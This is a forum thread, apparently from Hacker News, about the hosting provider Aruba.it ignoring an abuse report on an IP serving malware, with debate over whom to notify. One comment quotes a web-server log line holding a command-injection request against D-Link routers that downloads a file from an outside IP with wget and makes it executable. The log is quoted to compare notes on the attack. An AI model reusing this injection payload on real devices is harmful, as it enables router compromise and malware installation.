Aruba.it blind to malicious code hosting
I tried to notify aruba.it of someone obviously hosting malicious code and trying to attack web servers: http://80.211.112.150/k
(Reverse DNS resolves to their domain)
Their reaction? 1. in the chat they redirect me to dedicated hosting support form („only way to do it“) 2. Dedicated hosting support just closes my ticket.
Wow! I got this too (amongst other hosts). nginx_1 | 197.39.15.48 - - [30/Aug/2018:14:51:22 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.112.150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks... HTTP/1.1" 400 173 "-" "LMAO/2.0" "-" Apparently targeting dlink routers - https://twitter.com/txalin/status/1007625620090707974?lang=e... You are dealing with customer support for some Aruba customer, i.e. not you. Why don't you contact police or the site owner instead? If it's a hacked server, the owner has to notice the hack and ask for help cleaning up if necessary. You have no authority whatsoever, and if you attempt to stir up trouble about someone's web site, closing tickets is at the polite end of the response spectrum. You risk prosecution. If it's a brazen criminal using their own host, they are the customer and the site is working as expected. No customer support required. Errr... reading your points I presume you've never really done that (notifying a service provider). > Why don't you contact police or the site owner instead? Police? Seriously? My police here in germany or the italian police? What do you think will happen? Right: nothing.
Site owner? If you can tell me the site owner from an IP... I will do that. > You risk prosecution. By telling a service provider that they host malicious content and should do sth. about it? Now that's an interesting view. > If it's a brazen criminal using their own host [...] No customer support required. The customer support was the only way to contact the provider. It doesn't matter if they are housing or hosting malicious content. They are at least partly responsible, especially if someone is telling them. You are trying to intimidate a provider into messing with someone else's site, which amounts to hacking or worse. There's basically nothing you can do besides notify their abuse desk and probably get ignored, because abuse desks pay little attention to one-off complaints like that. If they do get taken down, it'll be by one of the larger security companies who detect the page (for example, if that IP sends spam) and includes it in their feed of bad IP's to aruba.